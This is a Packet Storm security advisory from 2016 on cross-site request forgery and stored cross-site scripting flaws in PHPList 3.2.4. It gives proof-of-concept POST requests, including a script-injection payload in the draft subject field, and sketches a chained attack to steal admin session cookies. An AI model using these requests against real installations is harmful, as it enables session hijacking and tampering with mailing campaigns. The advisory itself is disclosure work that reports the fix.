Twenty Year Anniversary

PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting

PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting
Posted Jun 1, 2016
Authored by Mickael Dorigny

PHPList version 3.2.4 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | b27a45e55fe8110a04dcdd2c862beb1f

PHPList 3.2.4 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: PHPList v3.2.4 CSRF/XSS
# Date: 01/06/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: https://www.phplist.com/
# Version: 3.2.4
# Category: CSRF/XSS
######################################################################

PHPList description :
======================================================================
phpList is an open source software for managing mailing lists. It is designed for the dissemination of information, such as newsletters, news, advertising to list of subscribers. It is written in PHP and uses a MySQL database to store the information. phpList is free and open-source software subject to the terms of the Affero General Public License (AGPL).

Vulnerabilities description :
======================================================================
phpList version 3.2.4 is vulnerable to multiple vulnerabilities like :
- CSRF
- Stored XSS

Poc n°1 : CSRF on Campaign Draft modification
============================================
The draft modification process is vulnerable to CSRF attack. When using the form, we can see that a form anti-CSRF token is used but it can be removed from the request wihtout causing error. The only prerequisite to exploit this CSRF is to target an existing Draft ID. This can be done with a simple code tricks wich send multiple modification requests while incremeting the Draft ID for example. To modify the Draft 5, use the following parameters :

[URL]
http://server/admin/?page=send&id=5
[POSTDATA]
workaround_fck_bug=1&followupto=&subject=MODIFIED_SUBJECT&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=

This vulnerability can make an authenticated user change campaign content an alter user experience.

PoC n°2 : Stored XSS on Campaign Draft Name
============================================
The campaign draft name, displayed when listing all campaign draft, is vulnerable to Stored XSS attack. This mean that the vulnerable code is saved in the database and displayed each time a admin/user go on the campaign draft list :
http://server/admin/?page=messages&tab=draft

The following request exploit this vulnerability :

[URL]
http://server/admin/?page=send&id=5
[POSTDATA]
workaround_fck_bug=1&followupto=&subject=DATA"><script>alert("XSS_again")</script>&fromfield=AAAA&sendmethod=inputhere&sendurl=e.g.+http://www.phplist.com/testcampaign.html&message=<p>A1</p>&footer=A1&id=5&status=draft&save=Save+and+continue+editing&id=5&status=draft&campaigntitle=(no+title)&testtarget=

Note that once this request is submitted, the user is not directly on the page that display the XSS. He have to go on this page : http://server/admin/?page=messages&tab=draft

Through this vulnerability, an attacker could tamper with page rendering, redirect victim to fake login page, or capture users credentials such cookies, and especially admin's ones.

Using two simple HTML page with auto JavaScript redirection, an attacker can exploit these two vulnerabilities to change the campaign draft content to make it display a Javascescript instruction and then use this Javascript execution to steal session cookie or bypass all other anti-CSRF protection of the PHPlist installation. The scenario exploiting this two vulnerabilities is presented in the video in "Addtional resources" section.

Solution:
======================================================================
- Update your PHPList installation to superior version (3.2.5 - https://www.phplist.org/newslist/phplist-3-2-5-whats-new/)

Additional resources :
======================================================================
- https://youtu.be/cU6ob4sCKgs
- https://www.phplist.org/newslist/phplist-3-2-5-whats-new/

Report timeline :
======================================================================
2016-05-11 : Advisory submitted to editor
2016-05-26 : Version 3.2.5 released with fixes
2016-06-01 : Public Advisory release

Credits :
======================================================================
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

My Packet Storm Security profile : https://packetstormsecurity.com/files/author/12112/

--
SYNETIS
CONTACT: www.synetis.com | www.information-security.fr

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

May 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    15 Files
  • 2
    May 2nd
    17 Files
  • 3
    May 3rd
    30 Files
  • 4
    May 4th
    29 Files
  • 5
    May 5th
    2 Files
  • 6
    May 6th
    3 Files
  • 7
    May 7th
    13 Files
  • 8
    May 8th
    27 Files
  • 9
    May 9th
    17 Files
  • 10
    May 10th
    15 Files
  • 11
    May 11th
    8 Files
  • 12
    May 12th
    2 Files
  • 13
    May 13th
    8 Files
  • 14
    May 14th
    7 Files
  • 15
    May 15th
    43 Files
  • 16
    May 16th
    19 Files
  • 17
    May 17th
    16 Files
  • 18
    May 18th
    15 Files
  • 19
    May 19th
    3 Files
  • 20
    May 20th
    6 Files
  • 21
    May 21st
    1 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close